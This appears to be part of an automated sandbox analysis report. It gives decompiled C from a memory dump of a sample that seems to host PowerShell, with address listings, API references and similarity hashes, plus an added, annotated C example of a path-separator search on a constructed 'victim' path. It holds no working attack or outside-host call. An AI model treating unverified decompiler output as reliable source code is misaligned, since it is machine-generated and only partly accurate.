								 *((char*)(_t209 - 4)) = 5;
								_t203 =  *(_t209 - 0x20);
								__eflags = _t203;
								if(_t203 == 0) {
									_t171 = 0;
									__eflags = 0;
								} else {
									_t171 =  *_t203;
								}
								_t120 =  *(_t209 - 0x2c);
								 *0x1261204(_t120, _t171, _t209 - 0x30);
								_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x94))))();
								__eflags = _t122;
								if(_t122 >= 0) {
									_t123 =  *(_t209 - 0x30);
									__eflags = _t123;
									if(_t123 != 0) {
										_t196 = _t209 - 0x28;
										_t200 =  *( *_t123 + 0x68);
										_t174 = _t200;
										 *0x1261204(_t123, _t209 - 0x28);
										_t125 =  *_t200();
										__eflags = _t125;
										if(_t125 < 0) {
											goto L27;
										}
										_t130 = E0125BA32(_t174, _t196, _t200,  *(_t209 - 0x28),  *(_t209 + 8),  *(_t209 + 0xc), 1, 1);
										__eflags = _t130;
										if(_t130 == 0) {
											goto L29;
										}
										__imp__#7( *(_t209 - 0x28));
										_t200 = _t130;
										_t197 = 2;
										_t60 =  &(_t200[0]); // 0x1
										_t133 = E0125972E( ~(0 | __eflags > 0x00000000) | _t60 * _t197);
										 *(_t209 - 0x20) = _t133;
										__eflags = _t133;
										if(_t133 == 0) {
											goto L29;
										}
										_t69 =  &(_t200[0]); // 0x1
										_t134 = E0125CE50(_t133, _t69,  *(_t209 - 0x28));
										__eflags = _t134;
										if(_t134 < 0) {
											goto L29;
										}
										 *( *(_t209 - 0x38)) =  *(_t209 - 0x20);
										goto L30;
									}
									_push( *(_t209 - 0x18));
									_push(0x21);
									goto L28;
								} else {
									L27:
									_push( *(_t209 - 0x18));
									_push(0x12);
									L28:
									_t126 =  *0x12606dc; // 0x3403de0
									_t200 =  *_t126;
									 *0x1261204(_t126, 0);
									 *((intOrPtr*)( *_t126 + 4))();
									L29:
									_t142 = 0;
									__eflags = 0;
									L30:
									__eflags = _t203;
									if(_t203 != 0) {
										E0125BB5A(_t203);
									}
									goto L44;
								}
							}
						}
						_push(_t90);
						_push(0xc);
						L9:
						_t186 =  *0x12606dc; // 0x3403de0
						_push(0);
						_push(_t186);
						_t203 =  *_t186;
						goto L10;
					}
					_push(0);
					_push(0xb);
					goto L9;
				}
				_t138 =  *0x12606dc; // 0x3403de0
				_t203 =  *_t138;
				 *0x1261204(_t138, 1, 2, L"NULL");
				 *((intOrPtr*)( *_t138 + 4))();
				goto L5;
			}
                                                                                                                                                                                                                              0x0125cb97
                                                                                                                                                                                                                              0x0125cb98
                                                                                                                                                                                                                              0x0125cb99
                                                                                                                                                                                                                              0x0125cb9a
                                                                                                                                                                                                                              0x0125cba0
                                                                                                                                                                                                                              0x0125cba2
                                                                                                                                                                                                                              0x0125cba8
                                                                                                                                                                                                                              0x0125cbaa
                                                                                                                                                                                                                              0x0125cbac
                                                                                                                                                                                                                              0x0125cd62
                                                                                                                                                                                                                              0x0125cd62
                                                                                                                                                                                                                              0x0125cd65
                                                                                                                                                                                                                              0x0125cd68
                                                                                                                                                                                                                              0x0125cd6a
                                                                                                                                                                                                                              0x0125cd6c
                                                                                                                                                                                                                              0x0125cd71
                                                                                                                                                                                                                              0x0125cd76
                                                                                                                                                                                                                              0x0125cd7c
                                                                                                                                                                                                                              0x0125cd7c
                                                                                                                                                                                                                              0x0125cd81
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd88
                                                                                                                                                                                                                              0x0125cd8b
                                                                                                                                                                                                                              0x0125cd93
                                                                                                                                                                                                                              0x0125cd9b
                                                                                                                                                                                                                              0x0125cda3
                                                                                                                                                                                                                              0x0125cdab
                                                                                                                                                                                                                              0x0125cdb0
                                                                                                                                                                                                                              0x0125cdb4
                                                                                                                                                                                                                              0x0125cdb6
                                                                                                                                                                                                                              0x0125cdb6
                                                                                                                                                                                                                              0x0125cdbf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cdc5
                                                                                                                                                                                                                              0x0125cbb2
                                                                                                                                                                                                                              0x0125cbb7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cbbd
                                                                                                                                                                                                                              0x0125cbcf
                                                                                                                                                                                                                              0x0125cbd5
                                                                                                                                                                                                                              0x0125cbd7
                                                                                                                                                                                                                              0x0125cbd9
                                                                                                                                                                                                                              0x0125cd4e
                                                                                                                                                                                                                              0x0125cd4e
                                                                                                                                                                                                                              0x0125cd51
                                                                                                                                                                                                                              0x0125cd56
                                                                                                                                                                                                                              0x0125cd58
                                                                                                                                                                                                                              0x0125cd5a
                                                                                                                                                                                                                              0x0125cd5b
                                                                                                                                                                                                                              0x0125cb31
                                                                                                                                                                                                                              0x0125cb34
                                                                                                                                                                                                                              0x0125cb3a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cb3d
                                                                                                                                                                                                                              0x0125cbdf
                                                                                                                                                                                                                              0x0125cbe2
                                                                                                                                                                                                                              0x0125cbe4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cbf1
                                                                                                                                                                                                                              0x0125cbf4
                                                                                                                                                                                                                              0x0125cbf6
                                                                                                                                                                                                                              0x0125cbfc
                                                                                                                                                                                                                              0x0125cbfe
                                                                                                                                                                                                                              0x0125cc00
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc06
                                                                                                                                                                                                                              0x0125cc09
                                                                                                                                                                                                                              0x0125cc0b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc11
                                                                                                                                                                                                                              0x0125cc15
                                                                                                                                                                                                                              0x0125cc18
                                                                                                                                                                                                                              0x0125cc1b
                                                                                                                                                                                                                              0x0125cc1d
                                                                                                                                                                                                                              0x0125cc1f
                                                                                                                                                                                                                              0x0125cc29
                                                                                                                                                                                                                              0x0125cc2f
                                                                                                                                                                                                                              0x0125cc2f
                                                                                                                                                                                                                              0x0125cc31
                                                                                                                                                                                                                              0x0125cc38
                                                                                                                                                                                                                              0x0125cc3d
                                                                                                                                                                                                                              0x0125cc3f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc45
                                                                                                                                                                                                                              0x0125cc4f
                                                                                                                                                                                                                              0x0125cc51
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc57
                                                                                                                                                                                                                              0x0125cc5f
                                                                                                                                                                                                                              0x0125cc64
                                                                                                                                                                                                                              0x0125cc68
                                                                                                                                                                                                                              0x0125cc6b
                                                                                                                                                                                                                              0x0125cc6d
                                                                                                                                                                                                                              0x0125cc73
                                                                                                                                                                                                                              0x0125cc73
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc75
                                                                                                                                                                                                                              0x0125cc88
                                                                                                                                                                                                                              0x0125cc8e
                                                                                                                                                                                                                              0x0125cc90
                                                                                                                                                                                                                              0x0125cc92
                                                                                                                                                                                                                              0x0125ccc8
                                                                                                                                                                                                                              0x0125cccb
                                                                                                                                                                                                                              0x0125cccd
                                                                                                                                                                                                                              0x0125ccd8
                                                                                                                                                                                                                              0x0125ccdd
                                                                                                                                                                                                                              0x0125cce0
                                                                                                                                                                                                                              0x0125cce2
                                                                                                                                                                                                                              0x0125cce8
                                                                                                                                                                                                                              0x0125ccea
                                                                                                                                                                                                                              0x0125ccec
Control-flow graph view (interactive; not reproduced). Basic block addresses listed for this function: 0x0125cabe through 0x0125cd47; 0x00000000 placeholder entries omitted.

APIs
• __EH_prolog3_GS.LIBCMT ref: 0125CA90
• CoInitializeEx.OLE32(00000000,00000000,?,00000040,0125B7E0,00000000,00000001), ref: 0125CB19
• CoCreateInstance.OLE32(01253210,00000000,00000001,01253200,00000000,?,00000040,0125B7E0,00000000,00000001), ref: 0125CB59
• SysStringLen.OLEAUT32(00000000), ref: 0125CD05
• CoUninitialize.OLE32(?,?,?,00000000,00000001), ref: 0125CDB6
• SysFreeString.OLEAUT32(00000000), ref: 0125CDBF
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: String$CreateFreeH_prolog3_InitializeInstanceUninitialize
• String ID: /PSConsoleFile/PSVersion/text()$NULL
• API String ID: 1646121346-3169875599
• Opcode ID: 8f8a4b3ba1661b560ffad390148fc4ef93fcc8cc9f80e3a4deffa5ef0155712e
• Instruction ID: d30153a2d8eda0068c1e20479d72e65d3f38d1a87a136415c7d96e2ae798d065
• Opcode Fuzzy Hash: 8f8a4b3ba1661b560ffad390148fc4ef93fcc8cc9f80e3a4deffa5ef0155712e
• Instruction Fuzzy Hash: ADA1A070A102069FDF54DFA8D985BAE7BB9FF48715F048118EE02EB294EB70AC11CB50
Uniqueness

Uniqueness Score: -1.00%
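
The decompiled listing that follows ends, within this excerpt, in a loop that walks a WCHAR buffer backward, comparing each 16-bit unit against 0x5c (L'\\') after first guarding the count against zero. The block below is an added example, not code from the sample or from the report: it reimplements that search readably so the decompiler output is easier to follow. SAMPLE_PATH is a constructed input, and strip_filename is an assumption about one common use of such a scan; what the sample actually does after a match (label L6) lies beyond this excerpt.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* WCHAR as on Windows: a 16-bit code unit (wchar_t is 32-bit on Linux, so
 * a fixed-width type keeps the example faithful to the decompiled shorts). */
typedef uint16_t WCHAR;

/* Index of the last 0x5c (L'\\') among the first `count` code units of buf,
 * or -1 if none. Mirrors the decompiled loop: start at count-1 and step down,
 * comparing each unit against 0x5c; the count==0 guard corresponds to the
 * decompiled `if(_t54 != 0)` and prevents count-1 from wrapping. */
int last_backslash_index(const WCHAR *buf, size_t count)
{
    if (count == 0)
        return -1;
    for (size_t i = count; i-- > 0;) {
        if (buf[i] == 0x5c)
            return (int)i;
    }
    return -1;
}

/* Widen an ASCII string to WCHAR (used only to build the constructed input).
 * Returns the number of code units written, excluding the terminator. */
size_t ascii_to_wchar(const char *s, WCHAR *out, size_t cap)
{
    size_t n = strlen(s);
    if (n >= cap)
        n = cap - 1;
    for (size_t i = 0; i < n; i++)
        out[i] = (WCHAR)(unsigned char)s[i];
    out[n] = 0;
    return n;
}

/* Assumed follow-up (not visible in the excerpt): cut the path after the last
 * separator so only the directory part, with trailing backslash, remains.
 * Returns the new length; a path without any separator is left untouched. */
size_t strip_filename(WCHAR *buf, size_t count)
{
    int idx = last_backslash_index(buf, count);
    if (idx < 0)
        return count;
    buf[idx + 1] = 0;
    return (size_t)idx + 1;
}

/* Constructed sample input; not taken from the analysed sample. */
static const char SAMPLE_PATH[] = "C:\\Users\\victim\\Documents\\payload.exe";

int demo_last_backslash(void)
{
    WCHAR buf[260];                       /* 0x104 code units, as in the decompiled call */
    size_t n = ascii_to_wchar(SAMPLE_PATH, buf, 260);
    return last_backslash_index(buf, n);  /* 25: the separator before "payload.exe" */
}

int demo_no_separator(void)
{
    WCHAR buf[260];
    size_t n = ascii_to_wchar("payload.exe", buf, 260);
    return last_backslash_index(buf, n);  /* -1: nothing to strip */
}

size_t demo_strip_len(void)
{
    WCHAR buf[260];
    size_t n = ascii_to_wchar(SAMPLE_PATH, buf, 260);
    return strip_filename(buf, n);        /* 26: "C:\Users\victim\Documents\" */
}

int main(void)
{
    printf("last separator at %d, stripped length %zu, no-separator case %d\n",
           demo_last_backslash(), demo_strip_len(), demo_no_separator());
    return 0;
}
```

The empty-buffer and no-separator cases are the ones worth checking when reading such a loop in decompiler output: without the zero guard the signed index would start at -1 and the `>= 0` test would skip the loop entirely, which is exactly the shape the decompiled `if(__eflags >= 0)` preserves.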

C-Code - Quality: 56%
E0125E590(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
    signed int _v8;
    intOrPtr _v24;
    signed int _v28;
    short _v44;
    char _v48;
    intOrPtr _v52;
    WCHAR* _v56;
    char _v526;
    short _v528;
    signed int _t48;
    intOrPtr* _t50;
    void* _t54;
    void* _t57;
    signed int _t71;
    signed int _t84;
    void* _t90;
    WCHAR* _t93;
    WCHAR* _t94;
    void* _t95;
    WCHAR* _t100;
    void* _t123;
    void* _t125;
    intOrPtr _t126;
    void* _t127;
    intOrPtr _t129;
    signed int _t130;
    void* _t131;
    void* _t140;
    void* _t141;
    signed int _t142;
    signed int _t144;

    _t123 = __edx;
    _t142 = _t144;
    _t48 =  *0x1260358; // 0xc21f7063 (__security_cookie; see __EH_prolog3_GS above)
    _v8 = _t48 ^ _t142; // /GS stack canary: cookie XOR frame pointer, checked on return
    _t93 = _a4;
    _t125 = __ecx;
    _t50 =  *((intOrPtr*)(__ecx + 8)); // object pointer held at this+8
    _t129 =  *_t50; // its vtable
    // indirect call through the pointer at 0x1261204 (target not resolved in this dump);
    // 0x104 = MAX_PATH code units into the buffer at &_v528
     *0x1261204(_t50, 0,  &_v528, 0x104, __edi, __esi, __ebx, _t141);
     *0x1261204( *((intOrPtr*)(__ecx + 8)),  *((intOrPtr*)(_t129 + 0xc))()); // virtual call, vtable slot +0xc
    _t54 =  *((intOrPtr*)(_t129 + 8))(); // virtual call, vtable slot +8; result used as a count below
    if(_t54 != 0) { // guard so that count - 1 cannot wrap
        _t11 = _t54 - 1; // -1
        _t130 = _t11;
        __eflags = _t130;
        if(__eflags >= 0) {
            while(1) { // scan the WCHAR buffer backward for 0x5c (L'\\'), i.e. a path separator
                __eflags =  *((short*)(_t142 + _t130 * 2 - 0x20c)) - 0x5c;
                if(__eflags == 0) {
                    goto L6; // match found; L6 lies beyond this excerpt
                }
                _t130 = _t130 - 1;
                                                                                                                                                                                                                              							__eflags = _t130;
                                                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                              					_t100 = _t93;
                                                                                                                                                                                                                              					_push( &_v526 + _t130 * 2);
                                                                                                                                                                                                                              					_t57 = E0125E76E(_t93, _t100, _t125, _t130, __eflags);
                                                                                                                                                                                                                              					_t131 = 2 + _t130 * 2;
                                                                                                                                                                                                                              					__eflags = _t131 - 0x208;
                                                                                                                                                                                                                              					if(_t131 >= 0x208) {
                                                                                                                                                                                                                              						E01259D26(_t57, _t93, _t100, _t123, _t125, _t131);
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						asm("int3");
                                                                                                                                                                                                                              						E0125A5F0(E0125AA71, _t93, _t125, _t131);
                                                                                                                                                                                                                              						_t94 = _t100;
                                                                                                                                                                                                                              						_t126 = _a12;
                                                                                                                                                                                                                              						_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                              						_v52 = _a8;
                                                                                                                                                                                                                              						_v56 = _a4;
                                                                                                                                                                                                                              						_v24 = 7;
                                                                                                                                                                                                                              						_v44 = 0;
                                                                                                                                                                                                                              						E0125EFA5( &_v48, __eflags, _a4, E0125F255(_a4));
                                                                                                                                                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                              						E0125ED61( &_v48, __eflags, _v52, E0125F255(_v52));
                                                                                                                                                                                                                              						E0125ED61( &_v48, __eflags, L".ni.dll", E0125F255(L".ni.dll"));
                                                                                                                                                                                                                              						_t135 =  *( *_t94);
                                                                                                                                                                                                                              						 *0x1261204( &_v48, 0x28);
                                                                                                                                                                                                                              						_t71 =  *((intOrPtr*)( *( *_t94)))();
                                                                                                                                                                                                                              						__eflags = _t71;
                                                                                                                                                                                                                              						if(_t71 != 0) {
                                                                                                                                                                                                                              							L10:
                                                                                                                                                                                                                              							E0125EF00(_t126,  &_v48, 0, 0xffffffff);
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							E0125EFA5( &_v48, __eflags, _v56, E0125F255(_v56));
                                                                                                                                                                                                                              							E0125ED61( &_v48, __eflags, _v52, E0125F255(_v52));
                                                                                                                                                                                                                              							E0125ED61( &_v48, __eflags, L".dll", E0125F255(L".dll"));
                                                                                                                                                                                                                              							_t135 =  *( *_t94);
                                                                                                                                                                                                                              							 *0x1261204( &_v48);
                                                                                                                                                                                                                              							_t84 =  *((intOrPtr*)( *( *_t94)))();
                                                                                                                                                                                                                              							__eflags = _t84;
                                                                                                                                                                                                                              							if(_t84 != 0) {
                                                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						E0125EC6D( &_v48, 1, 0);
                                                                                                                                                                                                                              						return E0125A59F(_t94, _t126, _t135);
                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                              						 *((short*)(_t142 + _t131 - 0x20c)) = 0;
                                                                                                                                                                                                                              						ExpandEnvironmentStringsW( &_v528, _t93, 0x104);
                                                                                                                                                                                                                              						ExpandEnvironmentStringsW(L"%windir%\\System32\\WindowsPowerShell\\v1.0\\",  &(_t93[0x104]), 0x104);
                                                                                                                                                                                                                              						_t90 = 0;
                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                              					_t90 = 0xffff0000;
                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                              					_pop(_t127);
                                                                                                                                                                                                                              					_pop(_t140);
                                                                                                                                                                                                                              					_pop(_t95);
                                                                                                                                                                                                                              					return E01259A40(_t90, _t95, _v8 ^ _t142, _t123, _t127, _t140);
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              			}
Instruction addresses (decompiler gutter for the block above, in source order; 0x00000000 marks lines with no address of their own):
0x0125e590 0x0125e593 0x0125e59b 0x0125e5a2 0x0125e5a6 0x0125e5ab 0x0125e5bb 0x0125e5bf 0x0125e5c4 0x0125e5d4 0x0125e5da 0x0125e5df 0x0125e5f9 0x0125e5f9 0x0125e5fc 0x0125e5fe
0x0125e600 0x0125e600 0x0125e609 0x00000000 0x00000000 0x0125e60b 0x0125e60b 0x0125e60e 0x00000000 0x00000000 0x00000000 0x0125e60e 0x0125e600 0x0125e610 0x0125e616 0x0125e61b
0x0125e61c 0x0125e621 0x0125e628 0x0125e62e 0x0125e665 0x0125e66a 0x0125e66b 0x0125e66c 0x0125e66d 0x0125e66e 0x0125e66f 0x0125e677 0x0125e67c 0x0125e686 0x0125e689 0x0125e68d
0x0125e692 0x0125e695 0x0125e69c 0x0125e6aa 0x0125e6b4 0x0125e6c2 0x0125e6d8 0x0125e6e3 0x0125e6e7 0x0125e6ef 0x0125e6f1 0x0125e6f3 0x0125e74b 0x0125e755
                                                                                                                                                                                                                              0x0125e6f5
                                                                                                                                                                                                                              0x0125e704
                                                                                                                                                                                                                              0x0125e718
                                                                                                                                                                                                                              0x0125e72e
                                                                                                                                                                                                                              0x0125e739
                                                                                                                                                                                                                              0x0125e73d
                                                                                                                                                                                                                              0x0125e745
                                                                                                                                                                                                                              0x0125e747
                                                                                                                                                                                                                              0x0125e749
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e749
                                                                                                                                                                                                                              0x0125e761
                                                                                                                                                                                                                              0x0125e76b
                                                                                                                                                                                                                              0x0125e630
                                                                                                                                                                                                                              0x0125e632
                                                                                                                                                                                                                              0x0125e648
                                                                                                                                                                                                                              0x0125e65b
                                                                                                                                                                                                                              0x0125e661
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e661
                                                                                                                                                                                                                              0x0125e5e1
                                                                                                                                                                                                                              0x0125e5e1
                                                                                                                                                                                                                              0x0125e5e6
                                                                                                                                                                                                                              0x0125e5e9
                                                                                                                                                                                                                              0x0125e5ea
                                                                                                                                                                                                                              0x0125e5ed
                                                                                                                                                                                                                              0x0125e5f6
                                                                                                                                                                                                                              0x0125e5f6

APIs
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?), ref: 0125E648
• ExpandEnvironmentStringsW.KERNEL32(%windir%\System32\WindowsPowerShell\v1.0\,?,00000104), ref: 0125E65B
• __EH_prolog3_GS.LIBCMT ref: 0125E677
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: EnvironmentExpandStrings$H_prolog3_
• String ID: %windir%\System32\WindowsPowerShell\v1.0\$.dll$.ni.dll$\
• API String ID: 1292458247-3266281645
• Opcode ID: 4ba26ad2d69c28476f42dd561af0d672ec0edeaffa52dccbddb3c2eb2b47becb
• Instruction ID: ea378cdd83f65ddb61ad6330b0035ada8b6ba1ffc5232385ddd8b5f2439a5b33
• Opcode Fuzzy Hash: 4ba26ad2d69c28476f42dd561af0d672ec0edeaffa52dccbddb3c2eb2b47becb
• Instruction Fuzzy Hash: 845184B5A11215ABCF54EFA4DC98AFEB778EF58310F018559ED16E7290DB306E04CBA0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 88%
E0125972E(int _a4) {
	char _v16;
	signed int _t13;
	signed int _t17;
	intOrPtr* _t20;
	intOrPtr* _t21;
	void* _t22;
	signed int _t25;
	intOrPtr _t29;
	intOrPtr _t32;
	intOrPtr _t33;

	while(1) {
		_t13 = malloc(_a4);
		if(_t13 != 0) {
			break;
		}
		_push(_a4);
		L01259E26();
		__eflags = _t13;
		if(_t13 == 0) {
			E01259700( &_v16);
			_push(0x125f5a8);
			_push( &_v16);
			L01259E2C();
			asm("int3");
			asm("int3");
			asm("int3");
			__eflags =  *0x1250000 - 0x5a4d; // 0x5a4d
			if(__eflags == 0) {
				_t29 =  *0x125003c; // 0x100
				__eflags =  *((intOrPtr*)(_t29 + 0x1250000)) - 0x4550;
				if( *((intOrPtr*)(_t29 + 0x1250000)) != 0x4550) {
					goto L5;
				} else {
					_t6 = _t29 + 0x1250018; // 0xc0e010b
					_t25 =  *_t6 & 0x0000ffff;
					__eflags = _t25 - 0x10b;
					if(_t25 == 0x10b) {
						_t17 = 0;
						__eflags =  *((intOrPtr*)(_t29 + 0x1250074)) - 0xe;
						if( *((intOrPtr*)(_t29 + 0x1250074)) > 0xe) {
							__eflags =  *(_t29 + 0x12500e8);
							goto L13;
						}
					} else {
						__eflags = _t25 - 0x20b;
						if(_t25 != 0x20b) {
							goto L5;
						} else {
							_t17 = 0;
							__eflags =  *((intOrPtr*)(_t29 + 0x1250084)) - 0xe;
							if( *((intOrPtr*)(_t29 + 0x1250084)) > 0xe) {
								__eflags =  *(_t29 + 0x12500f8);
								L13:
								_t12 = __eflags != 0;
								__eflags = _t12;
								_t17 = _t17 & 0xffffff00 | _t12;
							}
						}
					}
				}
			} else {
				L5:
				_t17 = 0;
			}
			 *0x1260378 = _t17;
			__set_app_type(E01259F0E(1));
			 *0x12606c0 =  *0x12606c0 | 0xffffffff;
			 *0x12606c4 =  *0x12606c4 | 0xffffffff;
			_t20 = __p__fmode();
			_t32 =  *0x12606b0; // 0x0
			 *_t20 = _t32;
			_t21 = __p__commode();
			_t33 =  *0x12606a4; // 0x0
			 *_t21 = _t33;
			_t22 = E0125A130();
                                                                                                                                                                                                                              						__eflags =  *0x1260354;
                                                                                                                                                                                                                              						if( *0x1260354 == 0) {
                                                                                                                                                                                                                              							__setusermatherr(E0125A130);
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						E0125A133(_t22);
                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                                                              				goto L17;
                                                                                                                                                                                                                              			}
0x01259745
0x01259748
0x01259751
0x00000000
0x00000000
0x01259738
0x0125973b
0x01259741
0x01259743
0x0125975a
0x0125975f
0x01259767
0x01259768
0x0125976d
0x0125976e
0x0125976f
0x01259775
0x0125977c
0x01259782
0x01259788
0x01259792
0x00000000
0x01259794
0x01259794
0x01259794
0x0125979b
0x012597a0
0x012597bc
0x012597be
0x012597c5
0x012597c7
0x00000000
0x012597c7
0x012597a2
0x012597a2
0x012597a7
0x00000000
0x012597a9
0x012597a9
0x012597ab
0x012597b2
0x012597b4
0x012597cd
0x012597cd
0x012597cd
0x012597cd
0x012597cd
0x012597b2
0x012597a7
0x012597a0
0x0125977e
0x0125977e
0x0125977e
0x0125977e
0x012597d2
0x012597dd
0x012597e3
0x012597ea
0x012597f3
0x012597f9
0x012597ff
0x01259801
0x01259807
0x0125980d
0x0125980f
0x01259814
0x0125981b
0x01259822
0x01259828
0x01259829
0x0125982e
0x01259830
0x00000000
0x00000000
0x00000000
0x00000000
0x01259743
0x01259756
0x00000000

APIs
• _callnewh.MSVCRT ref: 0125973B
  • Part of subcall function 01259700: ??0exception@@QAE@XZ.MSVCRT ref: 01259705
• malloc.MSVCRT ref: 01259748
• _CxxThrowException.MSVCRT(0125F5A8,0125F5A8), ref: 01259768
• __set_app_type.MSVCRT ref: 012597DD
• __p__fmode.MSVCRT ref: 012597F3
• __p__commode.MSVCRT ref: 01259801
• __setusermatherr.MSVCRT ref: 01259822
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ??0exception@@ExceptionThrow__p__commode__p__fmode__set_app_type__setusermatherr_callnewhmalloc
• String ID:
• API String ID: 2766816358-0
• Opcode ID: b061a9eb99ad432d7330315137b4a3597d435a4fd6dc8d712830b6eb041cafaa
• Instruction ID: c5efc6eb51520a4074bae33b423a5645e5f26886774cadfdf6d18a7f669ac518
• Opcode Fuzzy Hash: b061a9eb99ad432d7330315137b4a3597d435a4fd6dc8d712830b6eb041cafaa
• Instruction Fuzzy Hash: 7921A174820206CFDFB85F38F8CD5353B60AB40329F20866AEE15865E4EB7699D1DB04
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
			E0125D170() {
				signed int _v8;
				char _v16;
				void* _v20;
				int _v24;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t17;
				long _t23;
				char* _t25;
				void* _t27;
				void* _t30;
                                                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                                                              				signed int _t32;
                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                              
                                                                                                                                                                                                                              				_t14 =  *0x1260358; // 0xc21f7063
                                                                                                                                                                                                                              				_v8 = _t14 ^ _t35;
                                                                                                                                                                                                                              				_t37 = 0 -  *0x12608f8; // 0x0
                                                                                                                                                                                                                              				if(_t37 == 0) {
                                                                                                                                                                                                                              					_push(_t31);
                                                                                                                                                                                                                              					_v24 = 6;
                                                                                                                                                                                                                              					_t32 = 0;
                                                                                                                                                                                                                              					if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}", 0, 1,  &_v20) == 0) {
                                                                                                                                                                                                                              						_t23 = RegQueryValueExW(_v20, L"Locale", 0, 0,  &_v16,  &_v24);
                                                                                                                                                                                                                              						RegCloseKey(_v20);
                                                                                                                                                                                                                              						_t33 = _t33;
                                                                                                                                                                                                                              						if(_t23 == 0) {
                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                              								_t25 =  &_v16;
                                                                                                                                                                                                                              								__imp___wcsnicmp(_t25,  *((intOrPtr*)(0x1251270 + _t32 * 8)), 3);
                                                                                                                                                                                                                              								_t36 = _t36 + 0xc;
                                                                                                                                                                                                                              								if(_t25 == 0) {
                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t32 = _t32 + 1;
                                                                                                                                                                                                                              								if(_t32 < 0x1c) {
                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								goto L7;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							 *0x12608f8 =  *((intOrPtr*)(0x1251274 + _t32 * 8));
